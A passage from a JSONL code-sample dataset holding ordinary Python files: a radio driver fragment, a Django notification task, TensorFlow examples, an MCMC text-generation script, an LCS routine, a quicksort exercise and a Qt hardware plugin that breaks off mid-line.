# CRC_OK flag | LQI\n\n    set_idle(spi)\n    flush_rx(spi)\n    return payload\n\ndef rx_sync(spi, gpio, pin, n, time_threshold):\n    passed_time = 0\n    enter_rx_mode(spi)\n    while gpio.input(pin) == 0:\n        sleep(.001)\n        passed_time += .001\n        if passed_time >= time_threshold:\n            print(\"timeout\")\n            _ = set_idle(spi)\n            _ = flush_rx(spi)\n            return -1\n\n    while gpio.input(pin) != 0:\n        sleep(.001)\n\n    if rx_fifo_byte_count(spi) == 0:  # CRC check failed\n        #print(\"crc failed!\")\n        return -1\n    data = rx_fifo2data(spi, n)\n    while isRX(spi):\n        sleep(0.001)\n    _ = set_idle(spi)\n    _ = flush_rx(spi)\n    return data[1:]\n\n","sub_path":"edge/cc2500/cc2500.py","file_name":"cc2500.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"17894312","text":"import logging\nfrom smtplib import SMTPException\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.mail import send_mail\nfrom django.http import HttpRequest\nfrom django.urls import reverse\n\nfrom voseq.celery import app\n\nlog = logging.getLogger(__name__)\n\n\n@app.task\ndef log_email_error(\n    request: HttpRequest, exc: str, traceback: str, task_id: str\n) -> None:\n    log.error(\n        f\"log_email_error\\n--\\n\\nrequest {request} \\n\\nexc {exc}\"\n        f\"\\n\\ntraceback {traceback}\"\n    )\n\n\n@app.task\ndef notify_user(dataset_obj_id, user_id) -> None:\n    \"\"\"Send an email notification to a user.\n\n    The user that requested the dataset (looked up via ``user_id``) is\n    notified; the site admins are copied on the email.\n    \"\"\"\n    user = User.objects.get(id=user_id)\n    log.debug(f\"notify_user {dataset_obj_id}\")\n\n    subject = f\"Dataset creation completed - {dataset_obj_id}\"\n    relative_url = reverse('create_dataset.results', args=(dataset_obj_id,))\n    result_url = \"http://voseq.com\" + relative_url\n    content = \"Your dataset has been created successfully. \" \\\n              \"Please verify and download the results from: \" \\\n              f\"{result_url}\"\n    from_email = 'noreply@voseq.com'\n\n    if user and user.email:\n        to_emails = [user.email] + [email for name, email in settings.ADMINS]\n        try:\n            send_mail(subject, content, from_email, to_emails)\n        except SMTPException:\n            log.exception(\"Failed to notify_user for dataset \" + str(dataset_obj_id))\n        else:\n            log.debug(\"sent dataset status email to \" + str(to_emails))\n    else:\n        log.debug('Cannot send notification email. 
'\n 'No user / email assigned to job ' + str(dataset_obj_id))","sub_path":"public_interface/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"538676465","text":"import sphero\nfrom time import sleep\n\nourSphero = sphero.Sphero()\nourSphero.connect()\nsleep(0.5)\nourSphero.set_rgb(0,0,0)\n\nheading = 0\ncolor = [255,0,0]\n\ndef switchcolor(color):\n return [color[2],color[0],color[1]]\n\ndef switchheading(heading):\n heading += 90\n return heading % 360\n\nfor i in range(1,10):\n ourSphero.roll(50,heading,10)\n for j in range(1,3):\n sleep(1)\n ourSphero.set_rgb(color[0],color[1],color[2])\n color = switchcolor(color)\n heading = switchheading(heading)","sub_path":"firstSpheroApp.py","file_name":"firstSpheroApp.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"345649994","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os\nimport locale\nos.environ[\"PYTHONIOENCODING\"] = \"utf-8\"\n# myLocale=locale.setlocale(category=locale.LC_ALL, locale=\"en_GB.UTF-8\")\nimport sys\nimport time\nimport torch\nprint('Checking CUDA status:')\nprint(torch.cuda.is_available())\nif torch.cuda.is_available():\n\tprint(torch.cuda.current_device())\n\tprint(torch.cuda.device(0))\n\tprint(torch.cuda.device_count())\n\tprint(torch.cuda.get_device_name(0))\n\nimport numpy as np\nfrom reader import dataset_str\nfrom config import config\nimport csv\nconfig=config()\nimport os \n# os.environ['CUDA_VISIBLE_DEVICES']=config.GPU\nnp.random.seed(config.seed)\n\nfrom utils import choose_action, similarity, similarity_batch, normalize, sample_from_candidate, just_acc, \\\n\tget_sample_positions, mask_sentence, generate_candidate_input_with_mask, MASK_IDX, PAD_IDX, bert_scorer, \\\n\tgpt2_scorer, tokenizer, ConstraintSearch, penalty_constraint, get_sentiment_score, \\\n\tget_batch_sentiment_scores, reverse_label\n\ndef_sent_scorer = bert_scorer.sent_score\nsentiment = 'positive'\n\ndef main():\n\tif os.path.exists(config.use_output_path):\n\t\tos.system('rm ' + config.use_output_path)\n\twith open(config.use_output_path, 'a') as g:\n\t\tg.write(str(config) + '\\n\\n')\n\t# for item in config.record_time:\n\t# \tif os.path.exists(config.use_output_path + str(item)):\n\t# \t\tos.system('rm ' + config.use_output_path + str(item))\n\t#CGMH sampling for paraphrase\n\tsim=config.sim\n\t# sta_vec=list(np.zeros([config.num_steps-1]))\n\tconfig.shuffle=False\n\t#original sentence input\n\tuse_data = dataset_str(config.use_data_path)\n\tconfig.batch_size=1\n\tstep_size = config.step_size\n\n\tstart_time = time.time()\n\tproposal_cnt = 0\n\taccept_cnt = 0\n\tall_samples = []\n\tall_acc_samples = []\n\tall_chosen_samples = []\n\tfor sen_id in range(use_data.length):\n\t\tsent_ids = use_data.token_ids[sen_id]\n\t\tkeys = use_data.keys[sen_id]\n\t\tsearcher = ConstraintSearch(keys)\n\t\tsequence_length = len(sent_ids)\n\t\t#generate for each sentence\n\t\tsta_vec = np.zeros(sequence_length)\n\t\tinput_ids = np.array(sent_ids)\n\t\tinput_original = use_data.tokens[sen_id]\n\t\tprev_inds = []\n\t\told_prob = def_sent_scorer(tokenizer.decode(input_ids))\n\t\told_prob *= penalty_constraint(searcher.count_unsafisfied_constraint(searcher.sent2tag(input_ids)))\n\t\tif config.mode == 'sentiment':\n\t\t\told_prob *= 
get_sentiment_score(input_ids, sentiment)\n\t\tif sim != None:\n\t\t\told_prob *= similarity(input_ids, input_original, sta_vec)\n\n\t\toutputs = []\n\t\toutput_p = []\n\t\tfor iter in range(config.sample_time):\n\t\t\t# if iter in config.record_time:\n\t\t\t# \twith open(config.use_output_path, 'a', encoding='utf-8') as g:\n\t\t\t# \t\tg.write(bert_scorer.tokenizer.decode(input_ids)+'\\n')\n\t\t\t# print(bert_scorer.tokenizer.decode(input_ids).encode('utf8', errors='ignore'))\n\t\t\tpos_set = get_sample_positions(sequence_length, prev_inds, step_size)\n\t\t\taction_set = [choose_action(config.action_prob) for i in range(len(pos_set))]\n\t\t\t# if not check_constraint(input_ids):\n\t\t\t# \tif 0 not in pos_set:\n\t\t\t# \t\tpos_set[-1] = 0\n\t\t\tkeep_non = config.keep_non\n\t\t\tmasked_sent, adjusted_pos_set = mask_sentence(input_ids, pos_set, action_set)\n\t\t\tprev_inds = pos_set\n\n\t\t\tproposal_prob = 1.0 # Q(x'|x)\n\t\t\tproposal_prob_reverse = 1.0 # Q(x|x')\n\t\t\tinput_ids_tmp = np.array(masked_sent) # copy\n\t\t\tsequence_length_tmp = sequence_length\n\n\t\t\tfor step_i in range(len(pos_set)):\n\n\t\t\t\tind = adjusted_pos_set[step_i]\n\t\t\t\tind_old = pos_set[step_i]\n\t\t\t\taction = action_set[step_i]\n\t\t\t\tif config.restrict_constr:\n\t\t\t\t\tif step_i == len(pos_set) - 1:\n\t\t\t\t\t\tuse_constr = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tuse_constr = False\n\t\t\t\telse:\n\t\t\t\t\tuse_constr = True\n\t\t\t\t#word replacement (action: 0)\n\t\t\t\tif action==0:\n\t\t\t\t\tprob_mask = bert_scorer.mask_score(input_ids_tmp, ind, mode=0)\n\t\t\t\t\tinput_candidate, prob_candidate, reverse_candidate_idx, _ = \\\n\t\t\t\t\t\tgenerate_candidate_input_with_mask(input_ids_tmp, sequence_length_tmp, ind, prob_mask, config.search_size,\n\t\t\t\t\t\t old_tok=input_ids[ind_old], mode=action)\n\t\t\t\t\tif sim is not None and use_constr:\n\t\t\t\t\t\tsimilarity_candidate=similarity_batch(input_candidate, input_original,sta_vec)\n\t\t\t\t\t\tprob_candidate=prob_candidate*similarity_candidate\n\t\t\t\t\tprob_candidate_norm=normalize(prob_candidate)\n\t\t\t\t\tprob_candidate_ind=sample_from_candidate(prob_candidate_norm)\n\t\t\t\t\tinput_ids_tmp = input_candidate[prob_candidate_ind] # changed\n\t\t\t\t\tproposal_prob *= prob_candidate_norm[prob_candidate_ind] # Q(x'|x)\n\t\t\t\t\tproposal_prob_reverse *= prob_candidate_norm[reverse_candidate_idx] # Q(x|x')\n\t\t\t\t\tsequence_length_tmp += 0\n\t\t\t\t\tprint('action:0', prob_candidate_norm[prob_candidate_ind], prob_candidate_norm[reverse_candidate_idx])\n\n\t\t\t\t#word insertion(action:1)\n\t\t\t\tif action==1:\n\t\t\t\t\tprob_mask = bert_scorer.mask_score(input_ids_tmp, ind, mode=0)\n\n\t\t\t\t\tinput_candidate, prob_candidate, reverse_candidate_idx, non_idx = \\\n\t\t\t\t\t\tgenerate_candidate_input_with_mask(input_ids_tmp, sequence_length_tmp, ind, prob_mask, config.search_size,\n\t\t\t\t\t\t mode=action, old_tok=input_ids[ind_old], keep_non=keep_non)\n\n\t\t\t\t\tif sim is not None and use_constr:\n\t\t\t\t\t\tsimilarity_candidate=similarity_batch(input_candidate, input_original,sta_vec)\n\t\t\t\t\t\tprob_candidate=prob_candidate*similarity_candidate\n\t\t\t\t\tprob_candidate_norm=normalize(prob_candidate)\n\t\t\t\t\tprob_candidate_ind=sample_from_candidate(prob_candidate_norm)\n\t\t\t\t\tinput_ids_tmp = input_candidate[prob_candidate_ind]\n\t\t\t\t\tif prob_candidate_ind == non_idx:\n\t\t\t\t\t\tif input_ids_tmp[-1] == PAD_IDX:\n\t\t\t\t\t\t\tinput_ids_tmp = input_ids_tmp[:-1]\n\t\t\t\t\t\tprint('action:1 insert non', 1.0, 
1.0)\n\t\t\t\t\telse:\n\t\t\t\t\t\tproposal_prob *= prob_candidate_norm[prob_candidate_ind] # Q(x'|x)\n\t\t\t\t\t\tproposal_prob_reverse *= 1.0 # Q(x|x'), reverse action is deleting\n\t\t\t\t\t\tsequence_length_tmp += 1\n\t\t\t\t\t\tprint('action:1', prob_candidate_norm[prob_candidate_ind], 1.0)\n\n\t\t\t\t#word deletion(action: 2)\n\t\t\t\tif action==2:\n\t\t\t\t\tinput_ids_for_del = np.concatenate([input_ids_tmp[:ind], [MASK_IDX], input_ids_tmp[ind:]])\n\t\t\t\t\tif keep_non:\n\t\t\t\t\t\tnon_cand = np.array(input_ids_for_del)\n\t\t\t\t\t\tnon_cand[ind] = input_ids[ind_old]\n\t\t\t\t\t\tinput_candidate = np.array([input_ids_tmp, non_cand])\n\t\t\t\t\t\tprob_candidate = np.array([bert_scorer.sent_score(x) for x in input_candidate])\n\t\t\t\t\t\tnon_idx = 1\n\t\t\t\t\t\tif sim is not None and use_constr:\n\t\t\t\t\t\t\tsimilarity_candidate=similarity_batch(input_candidate, input_original,sta_vec)\n\t\t\t\t\t\t\tprob_candidate=prob_candidate*similarity_candidate\n\t\t\t\t\t\tprob_candidate_norm=normalize(prob_candidate)\n\t\t\t\t\t\tprob_candidate_ind=sample_from_candidate(prob_candidate_norm)\n\t\t\t\t\t\tinput_ids_tmp = input_candidate[prob_candidate_ind]\n\t\t\t\t\telse:\n\t\t\t\t\t\tnon_idx = -1\n\t\t\t\t\t\tprob_candidate_ind = 0\n\t\t\t\t\t\tinput_ids_tmp = input_ids_tmp # already deleted\n\n\t\t\t\t\tif prob_candidate_ind == non_idx:\n\t\t\t\t\t\tprint('action:2 delete non', 1.0, 1.0)\n\t\t\t\t\telse:\n\t\t\t\t\t\t# add mask, for evaluating reverse probability\n\t\t\t\t\t\tprob_mask = bert_scorer.mask_score(input_ids_for_del, ind, mode=0)\n\t\t\t\t\t\tinput_candidate, prob_candidate, reverse_candidate_idx, _ = \\\n\t\t\t\t\t\t\tgenerate_candidate_input_with_mask(input_ids_for_del, sequence_length_tmp, ind, prob_mask,\n\t\t\t\t\t\t\t config.search_size, mode=0, old_tok=input_ids[ind_old])\n\n\t\t\t\t\t\tif sim!=None:\n\t\t\t\t\t\t\tsimilarity_candidate=similarity_batch(input_candidate, input_original,sta_vec)\n\t\t\t\t\t\t\tprob_candidate=prob_candidate*similarity_candidate\n\t\t\t\t\t\tprob_candidate_norm = normalize(prob_candidate)\n\n\t\t\t\t\t\tproposal_prob *= 1.0 # Q(x'|x)\n\t\t\t\t\t\tproposal_prob_reverse *= prob_candidate_norm[reverse_candidate_idx] # Q(x|x'), reverse action is inserting\n\t\t\t\t\t\tsequence_length_tmp -= 1\n\n\t\t\t\t\t\tprint('action:2', 1.0, prob_candidate_norm[reverse_candidate_idx])\n\n\t\t\tnew_prob = def_sent_scorer(tokenizer.decode(input_ids_tmp))\n\t\t\tnew_prob *= penalty_constraint(searcher.count_unsafisfied_constraint(searcher.sent2tag(input_ids_tmp)))\n\t\t\tif config.mode == 'sentiment':\n\t\t\t\tnew_prob *= get_sentiment_score(input_ids_tmp, sentiment)\n\t\t\tif sim != None:\n\t\t\t\tsim_constr = similarity(input_ids_tmp, input_original, sta_vec)\n\t\t\t\tnew_prob *= sim_constr\n\t\t\tinput_text_tmp = tokenizer.decode(input_ids_tmp)\n\t\t\tall_samples.append([input_text_tmp,\n\t\t\t new_prob,\n\t\t\t searcher.count_unsafisfied_constraint(searcher.sent2tag(input_ids_tmp)),\n\t\t\t bert_scorer.sent_score(input_ids_tmp, log_prob=True),\n\t\t\t gpt2_scorer.sent_score(input_text_tmp, ppl=True)])\n\t\t\tif tokenizer.decode(input_ids_tmp) not in output_p:\n\t\t\t\toutputs.append(all_samples[-1])\n\t\t\tif outputs != []:\n\t\t\t\toutput_p.append(outputs[-1][0])\n\t\t\tif proposal_prob == 0.0 or old_prob == 0.0:\n\t\t\t\talpha_star = 1.0\n\t\t\telse:\n\t\t\t\talpha_star = (proposal_prob_reverse * new_prob) / (proposal_prob * old_prob)\n\t\t\talpha = min(1, alpha_star)\n\t\t\tprint(tokenizer.decode(input_ids_tmp).encode('utf8', 
errors='ignore'))\n\t\t\tprint(alpha, old_prob, proposal_prob, new_prob, proposal_prob_reverse)\n\t\t\tproposal_cnt += 1\n\t\t\tif choose_action([alpha, 1 - alpha]) == 0 and (\n\t\t\t\t\tnew_prob > old_prob * config.threshold or just_acc() == 0):\n\t\t\t\tif tokenizer.decode(input_ids_tmp) != tokenizer.decode(input_ids):\n\t\t\t\t\taccept_cnt += 1\n\t\t\t\t\tprint('Accept')\n\t\t\t\t\tall_acc_samples.append(all_samples[-1])\n\t\t\t\tinput_ids = input_ids_tmp\n\t\t\t\tsequence_length = sequence_length_tmp\n\t\t\t\told_prob = new_prob\n\n\n\t\t# choose output from samples\n\t\tfor num in range(config.min_length, 0, -1):\n\t\t\toutputss = [x for x in outputs if len(x[0].split()) >= num]\n\t\t\tprint(num, outputss)\n\t\t\tif outputss != []:\n\t\t\t\tbreak\n\t\tif outputss == []:\n\t\t\toutputss.append([tokenizer.decode(input_ids), 0])\n\t\toutputss = sorted(outputss, key=lambda x: x[1])[::-1]\n\t\twith open(config.use_output_path, 'a') as g:\n\t\t\tg.write(outputss[0][0] + '\\t' + str(outputss[0][1]) + '\\n')\n\t\tall_chosen_samples.append(outputss[0])\n\n\t\tprint('Sentence %d, used time %.2f\\n' % (sen_id, time.time()-start_time))\n\tprint(proposal_cnt, accept_cnt, float(accept_cnt/proposal_cnt))\n\n\tprint(\"All samples:\")\n\tall_samples_ = list(zip(*all_samples))\n\tfor metric in all_samples_[1:]:\n\t\tprint(np.mean(np.array(metric)))\n\n\tprint(\"All accepted samples:\")\n\tall_samples_ = list(zip(*all_acc_samples))\n\tfor metric in all_samples_[1:]:\n\t\tprint(np.mean(np.array(metric)))\n\n\tprint(\"All chosen samples:\")\n\tall_samples_ = list(zip(*all_chosen_samples))\n\tfor metric in all_samples_[1:]:\n\t\tprint(np.mean(np.array(metric)))\n\n\twith open(config.use_output_path + '-result.csv', 'w', newline='') as f:\n\t\tcsv_writer = csv.writer(f, delimiter='\\t')\n\t\tcsv_writer.writerow(['Sentence', 'Prob_sim', 'Constraint_num', 'Log_prob', 'PPL'])\n\t\tcsv_writer.writerows(all_samples)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"key_gen/sentiment_key_gen_base.py","file_name":"sentiment_key_gen_base.py","file_ext":"py","file_size_in_byte":10763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"218607906","text":"# INSERT Command\n\n# import the sqlite3 library \nimport sqlite3\n\n# create the connection object\nconn = sqlite3.connect(\"new.db\")\n\n# get a cursor object to execute SQL commands\nc = conn.cursor()\n\ntry:\n\t# insert data\n\tc.execute(\"INSERT INTO population VALUES('New York City', 'NY', 8400000)\")\n\tc.execute(\"INSERT INTO population VALUES('San Francisco', 'CA', 800000)\")\n\n\t# commit the changes\n\tconn.commit()\nexcept sqlite3.OperationalError:\n\tprint(\"Oops! Something went wrong. 
Try again...\")\n\n# close the database connection\nconn.close()\n\n","sub_path":"02_sql.py","file_name":"02_sql.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"264993353","text":"#!/usr/bin/env python3\n\nimport os\nimport numpy as np\nimport tensorflow as tf\ntf.compat.v1.reset_default_graph()\n\nsess = tf.compat.v1.Session()\n\nx_vals = np.concatenate((np.random.normal(-1, 1, 50), np.random.normal(3, 1, 50)))\ny_vals = np.concatenate((np.repeat(0., 50), np.repeat(1., 50)))\nx_data = tf.compat.v1.placeholder(shape=[1], dtype=tf.float32)\ny_target = tf.compat.v1.placeholder(shape=[1], dtype=tf.float32)\n\nA = tf.compat.v1.Variable(tf.compat.v1.random_normal(mean=10, shape=[1]))\n\nmy_output = tf.compat.v1.add(x_data, A)\n\nmy_output_expanded = tf.compat.v1.expand_dims(my_output, 0)\ny_target_expanded = tf.compat.v1.expand_dims(y_target, 0)\n\ninit = tf.compat.v1.global_variables_initializer()\nsess.run(init)\n\nxentropy = tf.compat.v1.nn.sigmoid_cross_entropy_with_logits(logits=my_output_expanded, labels=y_target_expanded)\n\nmy_opt = tf.compat.v1.train.GradientDescentOptimizer(0.05)\ntrain_step = my_opt.minimize(xentropy)\n\nfor i in range(1400):\n    rand_index = np.random.choice(100)\n    rand_x = [x_vals[rand_index]]\n    rand_y = [y_vals[rand_index]]\n\n    sess.run(train_step, feed_dict={x_data: rand_x, y_target: rand_y})\n    if (i + 1) % 200 == 0:\n        print('Step #' + str(i + 1) + ' A = ' + str(sess.run(A)))\n        print('Loss = ' + str(sess.run(xentropy, feed_dict={x_data: rand_x, y_target: rand_y})))\n\npredictions = []\nfor i in range(len(x_vals)):\n    x_val = [x_vals[i]]\n    prediction = sess.run(tf.compat.v1.round(tf.compat.v1.sigmoid(my_output)), feed_dict={x_data: x_val})\n    predictions.append(prediction[0])\n\naccuracy = sum(x==y for x,y in zip(predictions, y_vals)) / 100.\nprint('Ending Accuracy = ' + str(np.round(accuracy, 2)))","sub_path":"01_TensorFlow_Way/05_Implementing_Back_Propagation/05_back_propagation_classification.py","file_name":"05_back_propagation_classification.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"97039413","text":"import tensorflow as tf\nimport math\n\ndef mlp(input_x, image_pixels=28, hidden_units=100, num_classes=10):\n    hid_w = tf.Variable(tf.truncated_normal([image_pixels * image_pixels, hidden_units], stddev=1.0 / image_pixels), name='hid_w')\n    hid_b = tf.Variable(tf.zeros([hidden_units]), name='hid_b')\n\n    sm_w = tf.Variable(tf.truncated_normal([hidden_units, num_classes], stddev=1.0 / math.sqrt(hidden_units)), name='sm_w')\n    sm_b = tf.Variable(tf.zeros([num_classes]), name='sm_b')\n\n    hid_lin = tf.nn.xw_plus_b(input_x, hid_w, hid_b)\n    hid = tf.nn.relu(hid_lin)\n\n    logits = tf.add(tf.matmul(hid, sm_w), sm_b)\n    return logits\n
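\n# Example wiring (added; not part of the original module), assuming TF1-style\n# placeholders for flattened 28x28 images and one-hot labels:\n#\n#   x = tf.placeholder(tf.float32, [None, 28 * 28])\n#   y_ = tf.placeholder(tf.float32, [None, 10])\n#   loss = tf.reduce_mean(\n#       tf.nn.softmax_cross_entropy_with_logits_v2(labels=y_, logits=mlp(x)))\n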
\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"353765637","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass FilesNotSyncingError(Model):\n    \"\"\"Files not syncing error object.\n\n    Variables are only populated by the server, and will be ignored when\n    sending a request.\n\n    :ivar error_code: Error code (HResult)\n    :vartype error_code: int\n    :ivar persistent_count: Count of persistent files not syncing with the\n     specified error code\n    :vartype persistent_count: long\n    :ivar transient_count: Count of transient files not syncing with the\n     specified error code\n    :vartype transient_count: long\n    \"\"\"\n\n    _validation = {\n        'error_code': {'readonly': True},\n        'persistent_count': {'readonly': True},\n        'transient_count': {'readonly': True},\n    }\n\n    _attribute_map = {\n        'error_code': {'key': 'errorCode', 'type': 'int'},\n        'persistent_count': {'key': 'persistentCount', 'type': 'long'},\n        'transient_count': {'key': 'transientCount', 'type': 'long'},\n    }\n\n    def __init__(self, **kwargs) -> None:\n        super(FilesNotSyncingError, self).__init__(**kwargs)\n        self.error_code = None\n        self.persistent_count = None\n        self.transient_count = None\n","sub_path":"sdk/storage/azure-mgmt-storagesync/azure/mgmt/storagesync/models/files_not_syncing_error_py3.py","file_name":"files_not_syncing_error_py3.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"598823371","text":"\"\"\"\nCompute the longest common subsequence (LCS).\n\nref: http://wordaligned.org/articles/longest-common-subsequence\n\"\"\"\n\nfrom collections import defaultdict, namedtuple\nfrom itertools import product\n\n\ndef lcs_grid(xs, ys, eq):\n    \"\"\"Create a grid for longest common subsequence calculations.\n    \n    Returns a grid where grid[(j, i)] is a pair (n, move) such that\n    - n is the length of the LCS of prefixes xs[:i], ys[:j]\n    - move is \\, ^, <, or e, depending on whether the best move\n    to (j, i) was diagonal, downwards, or rightwards, or None.\n    \n    Example:\n       T A R O T\n    A 0< 1\\ 1< 1< 1<\n    R 0< 1^ 2\\ 2< 2<\n    T 1\\ 1< 2^ 2< 3\\\n    \"\"\"\n    Cell = namedtuple('Cell', 'length move')\n    grid = defaultdict(lambda: Cell(0, 'e'))\n    sqs = product(enumerate(ys), enumerate(xs))\n    for (j, y), (i, x) in sqs:\n        if eq(x, y):\n            cell = Cell(grid[(j - 1, i - 1)].length + 1, '\\\\')\n        else:\n            left = grid[(j, i - 1)].length\n            over = grid[(j - 1, i)].length\n            if left < over:\n                cell = Cell(over, '^')\n            else:\n                cell = Cell(left, '<')\n        grid[(j, i)] = cell\n    return grid\n\n\ndef lcs(xs, ys, eq=lambda x, y: x == y):\n    \"\"\"Return a longest common subsequence of xs, ys.\"\"\"\n    # Create the LCS grid, then walk back from the bottom right corner\n    grid = lcs_grid(xs, ys, eq)\n    i, j = len(xs) - 1, len(ys) - 1\n    lcs = list()\n    for move in iter(lambda: grid[(j, i)].move, 'e'):\n        if move == '\\\\':\n            lcs.append((i, j))\n            i -= 1\n            j -= 1\n        elif move == '^':\n            j -= 1\n        elif move == '<':\n            i -= 1\n    lcs.reverse()\n    return lcs\n","sub_path":"grader/common/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"402091000","text":"# 215\n# Sorting-algorithm practice: write a quicksort\n\ndef quicksort(arr, left, right):\n    if left >= right:\n        return\n    key = arr[left]\n    l, r = left, right\n    while l < 
r:\n while arr[r] >= key and l < r:\n r -= 1\n while arr[l] < key and l < r:\n l += 1\n \n arr[l], arr[r] = arr[r], arr[l]\n quicksort(arr, left, l)\n quicksort(arr, r + 1, right)\n\ndef quick(arr):\n quicksort(arr, 0, len(arr) - 1)\n\n\ndef findKthLargest(nums, k):\n quick(nums)\n return nums[-k]\n\nt = [3, 2, 1, 5, 6, 4]\nt.sort()\nprint(t)\n","sub_path":"algorithm/leetcode/数组问题/数组中的第k个最大元素.py","file_name":"数组中的第k个最大元素.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"110484302","text":"# -*- coding: utf-8 -*- \n\"\"\"\nAnalog In Plugin\nCopyright (C) 2011-2012 Olaf Lüke \nCopyright (C) 2014 Matthias Bolte \n\nanalog_in.py: Analog In Plugin Implementation\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License \nas published by the Free Software Foundation; either version 2 \nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\nGeneral Public License for more details.\n\nYou should have received a copy of the GNU General Public\nLicense along with this program; if not, write to the\nFree Software Foundation, Inc., 59 Temple Place - Suite 330,\nBoston, MA 02111-1307, USA.\n\"\"\"\n\nfrom brickv.plugin_system.plugin_base import PluginBase\nfrom brickv.plot_widget import PlotWidget\nfrom brickv.bindings.bricklet_analog_in import BrickletAnalogIn\nfrom brickv.async_call import async_call\n\nfrom PyQt4.QtGui import QVBoxLayout, QLabel, QHBoxLayout, QComboBox, QSpinBox\nfrom PyQt4.QtCore import pyqtSignal, Qt\n \nclass VoltageLabel(QLabel):\n def setText(self, text):\n text = \"Voltage: \" + text + \" V\"\n super(VoltageLabel, self).setText(text)\n \nclass AnalogIn(PluginBase):\n qtcb_voltage = pyqtSignal(int)\n \n def __init__(self, *args):\n PluginBase.__init__(self, BrickletAnalogIn, *args)\n \n self.ai = self.device\n \n self.qtcb_voltage.connect(self.cb_voltage)\n self.ai.register_callback(self.ai.CALLBACK_VOLTAGE,\n self.qtcb_voltage.emit) \n \n self.voltage_label = VoltageLabel('Voltage: ')\n \n self.current_value = None\n \n plot_list = [['', Qt.red, self.get_current_value]]\n self.plot_widget = PlotWidget('Voltage [mV]', plot_list)\n\n layout_h2 = QHBoxLayout()\n layout_h2.addStretch()\n layout_h2.addWidget(self.voltage_label)\n layout_h2.addStretch()\n\n layout = QVBoxLayout(self)\n layout.addLayout(layout_h2)\n layout.addWidget(self.plot_widget)\n\n if self.firmware_version >= (2, 0, 1):\n self.combo_range = QComboBox()\n self.combo_range.addItem('Automatic', BrickletAnalogIn.RANGE_AUTOMATIC)\n if self.firmware_version >= (2, 0, 3):\n self.combo_range.addItem('0V - 3.30V', BrickletAnalogIn.RANGE_UP_TO_3V)\n self.combo_range.addItem('0V - 6.05V', BrickletAnalogIn.RANGE_UP_TO_6V)\n self.combo_range.addItem('0V - 10.32V', BrickletAnalogIn.RANGE_UP_TO_10V)\n self.combo_range.addItem('0V - 36.30V', BrickletAnalogIn.RANGE_UP_TO_36V)\n self.combo_range.addItem('0V - 45.00V', BrickletAnalogIn.RANGE_UP_TO_45V)\n self.combo_range.currentIndexChanged.connect(self.range_changed)\n\n layout_h1 = QHBoxLayout()\n layout_h1.addStretch()\n layout_h1.addWidget(QLabel('Range:'))\n layout_h1.addWidget(self.combo_range)\n\n if self.firmware_version >= (2, 0, 3):\n self.spin_average = QSpinBox()\n self.spin_average.setMinimum(0)\n 
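# averaging length 0-255: 0 turns averaging off and 255 is the maximum (assumed from the spin box range set here)\n            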
self.spin_average.setMaximum(255)\n self.spin_average.setSingleStep(1)\n self.spin_average.setValue(50)\n self.spin_average.editingFinished.connect(self.spin_average_finished)\n\n layout_h1.addStretch()\n layout_h1.addWidget(QLabel('Average Length:'))\n layout_h1.addWidget(self.spin_average)\n\n layout_h1.addStretch()\n layout.addLayout(layout_h1)\n\n def get_range_async(self, range_):\n self.combo_range.setCurrentIndex(self.combo_range.findData(range_))\n\n def get_averaging_async(self, average):\n self.spin_average.setValue(average)\n\n def start(self):\n if self.firmware_version >= (2, 0, 1):\n async_call(self.ai.get_range, None, self.get_range_async, self.increase_error_count)\n if self.firmware_version >= (2, 0, 3):\n async_call(self.ai.get_averaging, None, self.get_averaging_async, self.increase_error_count)\n async_call(self.ai.get_voltage, None, self.cb_voltage, self.increase_error_count)\n async_call(self.ai.set_voltage_callback_period, 100, None, self.increase_error_count)\n \n self.plot_widget.stop = False\n \n def stop(self):\n async_call(self.ai.set_voltage_callback_period, 0, None, self.increase_error_count)\n \n self.plot_widget.stop = True\n\n def destroy(self):\n pass\n\n def get_url_part(self):\n return 'analog_in'\n\n @staticmethod\n def has_device_identifier(device_identifier):\n return device_identifier == BrickletAnalogIn.DEVICE_IDENTIFIER\n\n def get_current_value(self):\n return self.current_value\n\n def cb_voltage(self, voltage):\n self.current_value = voltage\n self.voltage_label.setText(str(voltage/1000.0))\n\n def range_changed(self, index):\n if index >= 0 and self.firmware_version >= (2, 0, 1):\n range_ = 